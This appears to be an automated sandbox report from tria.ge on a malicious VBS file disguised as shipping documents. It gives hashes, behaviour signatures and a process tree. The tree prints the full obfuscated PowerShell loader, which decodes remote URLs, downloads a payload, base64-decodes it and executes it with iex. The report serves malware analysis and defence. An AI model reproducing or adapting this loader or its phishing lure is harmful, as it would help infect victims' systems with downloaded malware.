Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    04/07/2024, 03:08

General

  • Target

    waybill_shipping_documents_original_BL_CI&PL_03_07_2024_00000000_doc.vbs

  • Size

    26KB

  • MD5

    503813637a43724a817bf18d9f8b6610

  • SHA1

    c44800bcab2246b8cea09d9c8e8b56d461a634cc

  • SHA256

    027478d4f38530836abfa6819748b88b4b540d0a27090903d697a5d3e555535e

  • SHA512

    486ac7e3b46725c0da9f27051d6b657a59746a99d2788ccf971096ab8b920dcb3547acc320ca83d064a639694f992b917705bfb839729ac3473237a12ce2bb4e

  • SSDEEP

    384:VBlzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgww74LKQKhOAp:ZzSR022X/523S0e8xPPm+Tmq5qPtxhgz

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 55 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\waybill_shipping_documents_original_BL_CI&PL_03_07_2024_00000000_doc.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2392
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Iliocaudal66 glug ekslibrisenes Unstooped Feverweed Regnvaad Autolycus Revsedes fishpotter Identitetsantagelsens tilrettelagt Separationsbevillingens Oratoriers Kunstanmeldelsen Bjergets Erhversevne Groovy Donkeywork Pyrenopeziza Fluefangernes Skakbrikkernes92 Pleasantish indbrnder Bevaringsforeninger Iliocaudal66 glug ekslibrisenes Unstooped Feverweed Regnvaad Autolycus Revsedes fishpotter Identitetsantagelsens tilrettelagt Separationsbevillingens Oratoriers Kunstanmeldelsen Bjergets Erhversevne Groovy Donkeywork Pyrenopeziza Fluefangernes Skakbrikkernes92 Pleasantish indbrnder Bevaringsforeninger';If (${host}.CurrentCulture) {$Reaktionsdrevet++;}Function Livsforsikringer($Pacesetter){$Ascendentens=$Pacesetter.Length-$Reaktionsdrevet;$Lexicographic184='SUBsTRI';$Lexicographic184+='ng';For( $Tootsies82=1;$Tootsies82 -lt $Ascendentens;$Tootsies82+=2){$Iliocaudal66+=$Pacesetter.$Lexicographic184.Invoke( $Tootsies82, $Reaktionsdrevet);}$Iliocaudal66;}function Knucks($Derrik){ & ($Paasttelses) ($Derrik);}$Afbankningers=Livsforsikringer ' MOo z i,l.lTa / 5R.,0 .(BWSi nUd oTw sO N,T .1N0 ..0M;, .W,iMnR6 4P;. xC6T4,;. r.vT:S1E2R1 ..0.)V .G,eVcPk o,/ 2R0s1i0d0 1F0 1 SF iDr eEfPoRx /Q1A2N1 .U0 ';$Cornmonger=Livsforsikringer ' U.s eCrU-.ABg enn t. ';$Feverweed=Livsforsikringer 'ShKtNtNp.s,:,/P/,k i.pHePlS.Sc.oRm,..bVrB/A.SwHe l lA- kcnToAw nL/Ap.kAiA- vFa lIi d aOt i oBn /,t,8.XML b./.m x./.P aAg aOjReRn,sS. aIcDa.> h tSt.pEsD:G/,/AaSs,oUc i a t i aStMrHa.dSiGtFi iumPa r ibaU.,r,o / PEa g aBjTeFn,sH. aGc.aP ';$Semidiapente=Livsforsikringer 'C>U ';$Paasttelses=Livsforsikringer 'DiAeUxu ';$stedfortrderne='Revsedes';$Stinksvamp = Livsforsikringer ',e cChSo. G%Ua p pHd aKt aF%I\FE nFeRr,g i eBr n.eC.sB o r ,& & BeMcSh.o, .tA ';Knucks (Livsforsikringer ' $ g lDo,bDaAlC: DRa nDsIe m u s.iPk.=C(AcSmRdS A/ c. c$.S.tRiDn,k spvTa m pB), ');Knucks (Livsforsikringer '.$Rg,lKoKb aPlS: UCnEs t.o oGpAeGd.=u$,FSe,vDehr w e e,d,.,sBpSlCiStS(H$.S eUmMiUdAi a,p eEn.tTe )N ');Knucks (Livsforsikringer ' [.N,eDt .SS.e,r vTiWc e.PSo i nBtHMTa,nDa.g e r ].: :ASTe c,u r iGt ySP rFoIt.o c.oAlB ,=, [TN e tD.SSWe.cCu r.iFt.y PUr oKtPoKc,oTlETSy p.eR] :,:FT lUs 1D2E ');$Feverweed=$Unstooped[0];$Guruships232= (Livsforsikringer 'D$Sg l,oVbSa l :OBOu m p k iRnDsP3.1.=PN,e,wC-.OAbSjMeGc t .S,yTsUtJe mP.VN.e tC.OW e b C,lHiUeVn t');$Guruships232+=$Dansemusik[1];Knucks ($Guruships232);Knucks (Livsforsikringer 'C$MB,uSm pMk.i n,s,3T1L.,H.e aSdOeOrPs [ $,C,o,rGncmGoFn gSe r ],=.$SADfAb,aIn.k nAi.nFg e r s ');$Preponderating=Livsforsikringer 'T$NB.uTmNp kMiFn sF3O1S.BDSoBwrndl oFa dEF i,l eD(P$ F ecvye rKw e,eOdW,P$ PVl,e a.sgatn t,iUsfhD) ';$Pleasantish=$Dansemusik[0];Knucks (Livsforsikringer 'A$SgRlPo b a l : DSiLa s,t efm,ar= (UT.e.sAt.-,PTa tThN $uPAlBePaRs a.nSt iis,hB). ');while (!$Diastema) {Knucks (Livsforsikringer 'r$DgKlSoMbSaSlS:.F r i s k i.n,e.sTs.eFs =d$.t rIuTeM ') ;Knucks $Preponderating;Knucks (Livsforsikringer ',S tUa rTtU-.SCl,eAe p 4 ');Knucks (Livsforsikringer 'L$,gBlEoObSaSl :BD,iAaCs t,eRm.a = ( T eRsCt -UPSa.t h. $ PTl e,aUsHasnEt iRsAh.)A ') ;Knucks (Livsforsikringer 'L$.g lEo bNaAlE: eWk,sOl i.bbr i.sIeBn.eOs,=T$UgUl oHb.aIlU:.gKlFu.g +N+ %.$OU,nCsUt.oUo.pTe d ..cAo.u.nRto ') ;$Feverweed=$Unstooped[$ekslibrisenes];}$Defector=324114;$Lamelloid=25357;Knucks (Livsforsikringer ' $ gTl,oSbPa lP:Sf iSs.h p o tRtFe rK E= GSeDtB-mC oOnMtAeDn,tD S$ PMl eEaSs,aHn,tEiUs h. ');Knucks (Livsforsikringer 'F$VgdlHo bsa.lS:.MOaGnRq upeTeU = M[.SNymsAtUeBmA. CBo n,vGeor.t.]S: :CF rSorm B aBsUeH6.4HS tFrMi ndg,(.$.fai.s,hkp o,tStbe.rP)F ');Knucks (Livsforsikringer 'V$TgSl o bSaEl,:PS eEpEaArRa,t iIosn sPbPe v iUlMl isnBg e n s =. [sS y s t e m..,T,e xBtm.REFn.cioSd.iNn gE]L:B: A SSCPI I,.,G.eAt,S.tBrRiVnKg (.$hMOa nZq u,e.e ) ');Knucks (Livsforsikringer ' $ gOlDoUbFa lI:.H,uPs hEoSlOd nCi nSgAs b ufd.gVeFt tJe.r sT= $OS.eCpDaIr.a t isoCnAs bKeMv.i,l lIiUn.g eAnLs.. sSu.b sMtFrui nSgC(,$.D,e,fFe cBt o.rF,I$TLBa.mKeDlAl.oci.dG)U ');Knucks $Husholdningsbudgetters;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2880
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Energierne.Bor && echo t"
        3⤵
          PID:2468

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Cab4E51.tmp

      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • memory/2880-20-0x000007FEF5CFE000-0x000007FEF5CFF000-memory.dmp

      Filesize

      4KB

    • memory/2880-21-0x000000001B340000-0x000000001B622000-memory.dmp

      Filesize

      2.9MB

    • memory/2880-22-0x0000000001EB0000-0x0000000001EB8000-memory.dmp

      Filesize

      32KB

    • memory/2880-23-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

      Filesize

      9.6MB

    • memory/2880-24-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

      Filesize

      9.6MB

    • memory/2880-25-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

      Filesize

      9.6MB

    • memory/2880-26-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

      Filesize

      9.6MB

    • memory/2880-27-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

      Filesize

      9.6MB

    • memory/2880-28-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

      Filesize

      9.6MB

    • memory/2880-29-0x000007FEF5CFE000-0x000007FEF5CFF000-memory.dmp

      Filesize

      4KB

    • memory/2880-30-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

      Filesize

      9.6MB

    • memory/2880-31-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

      Filesize

      9.6MB